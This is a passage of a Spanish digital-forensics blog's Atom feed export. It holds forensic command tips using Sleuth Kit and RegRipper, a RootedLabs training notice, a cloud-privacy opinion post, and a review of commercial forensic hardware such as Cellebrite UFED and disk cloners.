imagen.&lt;/span&gt; &lt;/li&gt;&lt;li&gt; &lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;span class="text"&gt;&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="text"&gt;&lt;b&gt;find_inode:&lt;/b&gt; Determina que inodo ha asignado un bloque de una imagen.&lt;/span&gt; &lt;/li&gt;&lt;li&gt; &lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;span class="text"&gt;&lt;b&gt;istat&lt;/b&gt; : &lt;/span&gt;&lt;/span&gt;&lt;span class="text"&gt;Muestra información sobre un inodo.&lt;/span&gt; &lt;/li&gt;&lt;li&gt; &lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;span class="text"&gt;&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt; &lt;span class="text"&gt;&lt;b&gt;mac_merge:&lt;/b&gt; Combina la salida de 'fls-m' con la salida de mactime TCT para crear una línea de tiempo grandes.&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;&lt;div style="color: #444444;"&gt;C:\forensics\TSK\fls –m ‘C:/’ –f ntfs –r \\.\Z: &amp;gt; c:\casos_forenses\empresa\timelines\ficheros&lt;/div&gt;&lt;div style="color: #444444;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: #444444;"&gt;Perl C:\forensics\TSK\mactime.pl –d –b c:\casos_forenses\empresa\timelines\ficheros\lineadetiempo.csv&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Búsqueda de palabras importantes&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="color: #666666;"&gt;C:\casos_forenses\empresa\ripped&amp;gt;strings *.txt | grep –i &lt;/div&gt;&lt;div style="color: #666666;"&gt;C:\casos_forenses\empresa\ripped&amp;gt;strings *.csv | grep –i&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Por fechas&lt;/b&gt;&lt;br /&gt;&lt;div style="color: #666666;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: #666666;"&gt;fichero.csv | grep -i "Dec 3 2010" | grep "..b,r"&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Buscar HIVES en el NTUSER.dat con regtime &lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;La utilidad regtime.pl procesará las marcas de tiempo en cada clave de una sección del Registro&lt;br /&gt;&lt;br /&gt;C:\&amp;gt;Perl  C:\forensics\SIFT\bin\regtime.pl –m HKLM/system –r -d -m C:\casos_forenses\empresa\hives\system &amp;gt;&amp;gt; fichero.csv&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Otra forma con rip de las ya comentadas RegRipper&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="color: #666666;"&gt;C:\forensics\RegRipper\rip.exe –r c:\casos_forenses\empresa\registry\SAM –f SAM &amp;gt; sam_ripped.txt&lt;/div&gt;&lt;div style="color: #666666;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: #666666;"&gt;C:\forensics\RegRipper\rip.exe –r c:\casos_forenses\empresa\registry\system –f System&amp;gt;system_ripped.txt&lt;/div&gt;&lt;div style="color: #666666;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: #666666;"&gt;C:\forensics\RegRipper\rip.exe  –r c:\casos_forenses\empresa\registry\ntuser.dat –f ntuser&amp;gt; ntuser.ripped.txt&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Mostrar carpetas ocultas&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="color: #666666;"&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced&lt;br /&gt;&lt;b&gt;Value Name:&lt;/b&gt; Hidden&lt;br /&gt;&lt;b&gt;Data Type:&lt;/b&gt; REG_DWORD (DWORD Value)&lt;br /&gt;&lt;b&gt;Value Data:&lt;/b&gt; (1 = show hidden, 2 = do not show)&lt;/div&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Para MAC&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;span style="color: black;"&gt; &lt;/span&gt;&lt;br /&gt;Puedemos utilizar la función Analyze MacForensicsLab con el siguiente archivo:&lt;span style="color: #666666;"&gt; &lt;/span&gt;&lt;b style="color: #666666;"&gt;~ / Library / Preferences / com.apple.finder.plist&lt;/b&gt;&lt;span style="color: #666666;"&gt; &lt;/span&gt;Dentro de ese archivo que se encuentra &lt;b&gt;"FXConnectToLastURL".&lt;/b&gt;&amp;nbsp;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Esta entrada muestra los servidores de archivos relacionados con los datos del sospechoso. y la entrada &lt;b&gt;"CFURLAliasData"&lt;/b&gt;  tendrá los nombres de los servidores de archivo de acceso, imágenes de  disco montadas&lt;b&gt; y&amp;nbsp;&lt;/b&gt; muestra el último conjunto de carpetas que se accedió.&lt;br /&gt;&lt;br /&gt;&lt;i&gt;That's all, folks&lt;/i&gt;!!" &lt;br /&gt;&amp;nbsp;&lt;span style="color: black;"&gt; &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-6180050623980208134?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/6180050623980208134/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=6180050623980208134' title='3 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/6180050623980208134'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/6180050623980208134'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2010/12/tips-tips-i.html' title='Tips &amp; Tricks (I)'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_7dOLVYBL8vA/TPvOP-gWxRI/AAAAAAAACYQ/XuEbLgO8QdQ/s72-c/magia-hacer.jpg' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-63049807208014583</id><published>2010-11-30T11:37:00.000+01:00</published><updated>2010-11-30T11:37:37.897+01:00</updated><title type='text'>Publicados los RootedLabs 2011</title><content type='html'>Hola lectores,&lt;br /&gt;&lt;br /&gt;Ya han salido publicadas las RootedLabs 2011.&lt;br /&gt;&lt;br /&gt;Es un conjunto de actividades formativas que se realizarán durante los tres días previos a RootedCON 2011, es decir, &lt;strong style="font-weight: normal;"&gt;Lunes 28 de Febrero, Martes 1 y Miércoles 2 de Marzo de 2011. En lo que a mi respecta impartire una formación técnica &lt;/strong&gt;en Análisis forense en dispositivos móviles.&lt;br /&gt;&lt;br /&gt;Si os interesa el tema y quereis tomaros unas cervezas conmigo, digo aprender sobre este tema, ya sabeis...&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_7dOLVYBL8vA/TPTTyYcqRBI/AAAAAAAACYM/IskGl2TVYVg/s1600/Captura.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="296" src="http://2.bp.blogspot.com/_7dOLVYBL8vA/TPTTyYcqRBI/AAAAAAAACYM/IskGl2TVYVg/s400/Captura.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-63049807208014583?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://www.rootedcon.es/rootedlabs/rootedlabs-2011.html' title='Publicados los RootedLabs 2011'/><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/63049807208014583/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=63049807208014583' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/63049807208014583'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/63049807208014583'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2010/11/publicados-los-rootedlabs-2011.html' title='Publicados los RootedLabs 2011'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_7dOLVYBL8vA/TPTTyYcqRBI/AAAAAAAACYM/IskGl2TVYVg/s72-c/Captura.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-4658977729366537593</id><published>2010-11-23T23:39:00.000+01:00</published><updated>2010-11-23T23:39:38.211+01:00</updated><title type='text'>¿A que huelen la nubes? Una de privacidad</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;a href="http://4.bp.blogspot.com/_7dOLVYBL8vA/TOw8BRE45QI/AAAAAAAACX8/N_sp0pmRbWs/s1600/fondo.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="147" src="http://4.bp.blogspot.com/_7dOLVYBL8vA/TOw8BRE45QI/AAAAAAAACX8/N_sp0pmRbWs/s200/fondo.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;Hola lectores,&lt;br /&gt;&lt;br /&gt;Hoy he escrito un post de esos que joden, de esos de pensamiento profundo, de análisis y reflexión.&lt;br /&gt;&lt;br /&gt;Hoy muchas empresas y&amp;nbsp; muchas de ellas de seguridad hablan de la nube, esa donde todos tus datos de empleado y tus datos financieros y tus fotos de cumpleaños, de borracheras y de quien sabe qué, están allí, en poder de ellos y poco en tu mano.&lt;br /&gt;&lt;br /&gt;No es que sea pesimista, pero los lemas de "los amigos de tus amigos son mis amigos" no me mola. Eso de que tus correos infinitos en hipermegabytes y documentos 'gdocs' son suyos pero también mios no me mola. Eso de que 'me cago' lo voy a twittear tampoco, lo siento pero soy un espécimen raro, esos de los de antes y no digo que las redes sociales sean malas solo digo que nadie se lee la letra pequeña y que se informa nada o lo justo&lt;br /&gt;&lt;br /&gt;Y así nos van las cosas.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_7dOLVYBL8vA/TOwqbDrJhkI/AAAAAAAACXs/CVzH1Ao9-0k/s1600/Captura.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="86" src="http://4.bp.blogspot.com/_7dOLVYBL8vA/TOwqbDrJhkI/AAAAAAAACXs/CVzH1Ao9-0k/s400/Captura.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Cuantos problemas de privacidad no incluye una etiqueta en una foto o el cambio de tu estado &lt;br /&gt;¿Donde esta la 'security by default'? ya lo dijo con toda la razón Lorenzo en su&amp;nbsp; &lt;a href="http://www.securitybydefault.com/2010/07/vueltas-con-la-privacidad-en-facebook.html" style="color: #3d85c6;"&gt;post &lt;/a&gt;, pero además según dice facebook: &lt;br /&gt;&lt;br /&gt;.- Nos concedes una licencia no exclusiva, transferible (&lt;span style="color: red;"&gt;adios foto, adios toa para ti&lt;/span&gt;).&lt;br /&gt;&lt;br /&gt;.- Esta licencia finaliza cuando eliminas tu contenido o tu  cuenta (a menos que el contenido se ha compartido con terceros y éstos  no lo han eliminado) &lt;span style="color: red;"&gt;(usease, no te garantizo que este borrado) En este ejemplo que veis es de hace un mes y todavia me tienen localizado&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_7dOLVYBL8vA/TOw-DUernvI/AAAAAAAACYA/WRDfXJJcv7I/s1600/lahostia.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span id="goog_819001709"&gt;&lt;/span&gt;&lt;span id="goog_819001710"&gt;&lt;/span&gt;&lt;/a&gt;&lt;a href="http://4.bp.blogspot.com/_7dOLVYBL8vA/TOxBVsyRw6I/AAAAAAAACYE/H2ql7yz8ubc/s1600/haceunmes.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_7dOLVYBL8vA/TOxCUK7fNeI/AAAAAAAACYI/casClpje4io/s1600/haceunmes.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="201" src="http://4.bp.blogspot.com/_7dOLVYBL8vA/TOxCUK7fNeI/AAAAAAAACYI/casClpje4io/s320/haceunmes.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Y no es que este mal ni los culpo, pero hay muy poca información para el usuario o mejor dicho, mucha pero en letra pequeña y en casos escondidas.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_7dOLVYBL8vA/TOw0ETm_5iI/AAAAAAAACXw/nPmDQZFj4eo/s1600/Captura2.jPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="180" src="http://1.bp.blogspot.com/_7dOLVYBL8vA/TOw0ETm_5iI/AAAAAAAACXw/nPmDQZFj4eo/s400/Captura2.jPG" width="400" /&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Me fastidia el 'es posible' y 'el gif trasparente'... es decir la trampa que utilizo para saber cuando quiero capturar un sospechoso y abre un email (solo bajo petición judicial)...increíble que aceptemos estas cosas...(yo incluido)&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Y estas clausulas me dan un miedo que no veas, lo tienen todo todo.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_7dOLVYBL8vA/TOw2pEtM5nI/AAAAAAAACX0/soOkhhDGM0w/s1600/Captura3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="226" src="http://4.bp.blogspot.com/_7dOLVYBL8vA/TOw2pEtM5nI/AAAAAAAACX0/soOkhhDGM0w/s400/Captura3.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Tu IP, tu idioma, tu localización (si utilizas latitude), si instalas y desinstalas.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Además de todas estas cosas yo me pregunto si facebook tiene 200 millones de usuarios, algo parecido así:&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_7dOLVYBL8vA/TOw4TTbTPhI/AAAAAAAACX4/9JvIA6tj1PA/s1600/Captura5.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="181" src="http://1.bp.blogspot.com/_7dOLVYBL8vA/TOw4TTbTPhI/AAAAAAAACX4/9JvIA6tj1PA/s320/Captura5.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;¿Que poder tienen los gobiernos y las legislaciones sobre este nuevo estado o país?&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;¿Que ocurre si algún día alguien de la nube decide que no eres nadie, que has incumplido su política de privacidad o comercial y decide desterrarte?. ¿Que pasa con tus datos?, ¿realmente sabes donde están?, cuando borras ¿realmente borras?.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;¿A quien reclamas? &lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Claro que por otro lado con usuarios como estos...mejor me callo&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_7dOLVYBL8vA/TOw-DUernvI/AAAAAAAACYA/WRDfXJJcv7I/s1600/lahostia.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="218" src="http://3.bp.blogspot.com/_7dOLVYBL8vA/TOw-DUernvI/AAAAAAAACYA/WRDfXJJcv7I/s400/lahostia.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Se de un colega que le han pirateado su cuenta de la nube y ahora es un desterrado digital, tienen acceso a toda su vida... es lo que toca.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Yo voy a seguir con mi disco duro en local y cifrado por si acaso...&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-4658977729366537593?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/4658977729366537593/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=4658977729366537593' title='8 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/4658977729366537593'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/4658977729366537593'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2010/11/que-huelen-la-nubes-una-de-privacidad.html' title='¿A que huelen la nubes? Una de privacidad'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_7dOLVYBL8vA/TOw8BRE45QI/AAAAAAAACX8/N_sp0pmRbWs/s72-c/fondo.jpg' height='72' width='72'/><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-1081866501784792940</id><published>2010-11-16T11:43:00.000+01:00</published><updated>2010-11-16T11:43:27.820+01:00</updated><title type='text'>Hardware Forensics</title><content type='html'>Hola lectores,&lt;br /&gt;&lt;br /&gt;Hace tiempo que quiero hablaros de unos productos comerciales basados en Hardware que nos han ayudado en diversos casos forenses. No es que sea muy dado a  explicar productos comerciales en el blog, dado que me gusta emplear el ingenio con las propias herramientas que tenemos de código abierto o del propio sistema operativo. Pero la verdad que para casos  muy concretos, que requieran velocidad y sencillez, voy a proponer estos que nosotros estamos utilizando.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;DISPOSITIVOS MOVILES&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;UFED (Universal Forensic Extraction Device)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Maravilloso producto distribuido por &lt;a href="http://www.cellebrite.com/es/productos-de-analisis-forense/ufed-estandar.html"&gt;&lt;span style="color: #0b5394;"&gt;CELLEBRITE&lt;/span&gt; &lt;/a&gt;capaz de extraer datos de la mayoría de dispositivos móviles del mercado, incluidos los smartphones y dispositivos PDA (Palm OS, Microsoft, Blackberry, Symbian, iPhone y Google Android).&lt;br /&gt;&lt;br /&gt;Entre las cosas que es capaz de adquirir se encuentran las mas usuales:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Contactos&lt;/li&gt;&lt;li&gt;Mensajes de texto SMS&lt;/li&gt;&lt;li&gt;Mensajes de texto      eliminados (SIM/USIM)&lt;/li&gt;&lt;li&gt;Historial de llamadas      (recibidas, realizadas, perdidas)&lt;/li&gt;&lt;li&gt;Audio&lt;/li&gt;&lt;li&gt;Vídeo&lt;/li&gt;&lt;li&gt;Fotos e imágenes&lt;/li&gt;&lt;li&gt;Melodías&lt;/li&gt;&lt;li&gt;Datos del teléfono      (IMEI/ESN, número de teléfono)&lt;/li&gt;&lt;/ul&gt;&amp;nbsp;Para nosotros nos parece una herramienta imprescindible sobre todo cuando tienes que clonar un móvil casi sin tocarlo.&lt;br /&gt;&lt;br /&gt;Aquí tenéis unas fotos en acción obteniendo datos de un Iphone:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_7dOLVYBL8vA/TOEX9AGoMOI/AAAAAAAACW4/-8z18bGHp_A/s1600/Captura.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://4.bp.blogspot.com/_7dOLVYBL8vA/TOEX9AGoMOI/AAAAAAAACW4/-8z18bGHp_A/s320/Captura.JPG" width="216" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;&lt;span style="font-size: x-small;"&gt;Copia los datos del Iphone a un pendrive&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_7dOLVYBL8vA/TOEYT4R2yrI/AAAAAAAACW8/5-Al5gGvvCo/s1600/IMG_0130.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://4.bp.blogspot.com/_7dOLVYBL8vA/TOEYT4R2yrI/AAAAAAAACW8/5-Al5gGvvCo/s320/IMG_0130.JPG" width="239" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;&lt;span style="font-size: x-small;"&gt;Progreso de la copia&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_7dOLVYBL8vA/TOEZAe-YoII/AAAAAAAACXA/wbJ9n7rHhoY/s1600/Captura.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="233" src="http://1.bp.blogspot.com/_7dOLVYBL8vA/TOEZAe-YoII/AAAAAAAACXA/wbJ9n7rHhoY/s320/Captura.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;Proceso de recuperación de la información del iphone a un portátil&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;Otro de los productos que más solemos utilizar son las clonadoras.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;CLONADORES DE DISCO&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;VOOM HARDCOPY III&lt;/b&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;Si lo que queremos es una copia lo más rápidamente posible hemos de ir por este hardware duplicador de disco duro &lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;portátil, con capacidad de protección de disco y con doble salida para realizar desde clonados a discos idénticos o a imagen en formato dd. También&lt;/span&gt; una de las características que mas me gusta es la posibilidad de calcular el HASH de los discos.&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;Estas son algunas de sus capacidades:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;La velocidad de clonado a dos unidades de destino es de hasta 7.1 GB / min.&lt;/li&gt;&lt;li&gt; Posibilidad de realizar uno o dos pases con MD5 y SHA256&lt;/li&gt;&lt;li&gt;Extremadamente sencillo de utilizar &lt;/li&gt;&lt;li&gt; Actualizaciones de por vida &lt;/li&gt;&lt;li&gt; Adaptadores IDE incluidos.&lt;/li&gt;&lt;/ul&gt;Y aquí lo tenemos en acción:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_7dOLVYBL8vA/TOEhz-WVF_I/AAAAAAAACXE/hcbrPbs0FuU/s1600/IMG_0264.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="239" src="http://4.bp.blogspot.com/_7dOLVYBL8vA/TOEhz-WVF_I/AAAAAAAACXE/hcbrPbs0FuU/s320/IMG_0264.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;Vista global del clonador&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_7dOLVYBL8vA/TOEihuasMyI/AAAAAAAACXU/x0D2m5sVgjs/s1600/Captura.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="234" src="http://2.bp.blogspot.com/_7dOLVYBL8vA/TOEihuasMyI/AAAAAAAACXU/x0D2m5sVgjs/s320/Captura.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;b&gt;&lt;span style="font-size: x-small;"&gt;Calculando el hash&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;b&gt;WIFI&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;b&gt;WIRELESS DETECTIVE&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;span class="" id="result_box" lang="es"&gt;&lt;span title=""&gt;Este producto es una de nuestras mejores adquisiciones más o menos resumiendo es un sistema de interceptación en redes wifi. &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="" id="result_box" lang="es"&gt;&lt;span title=""&gt;Esto  permite un fácil seguimiento y captura de las actividades de Internet  del sospechoso, especialmente si se mueve de un lugar a otro. &lt;/span&gt;&lt;span title=""&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="" id="result_box" lang="es"&gt;&lt;span title=""&gt;Las características son las siguientes:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="" id="result_box" lang="es"&gt;&lt;span title=""&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Detecta el acceso no autorizado WIFI / intrusos (IDS).&lt;/li&gt;&lt;li&gt;Proporciona información detallada de la AP, routers inalámbricos y estaciones inalámbricas (como el canal, Mbps, la seguridad (encriptación), 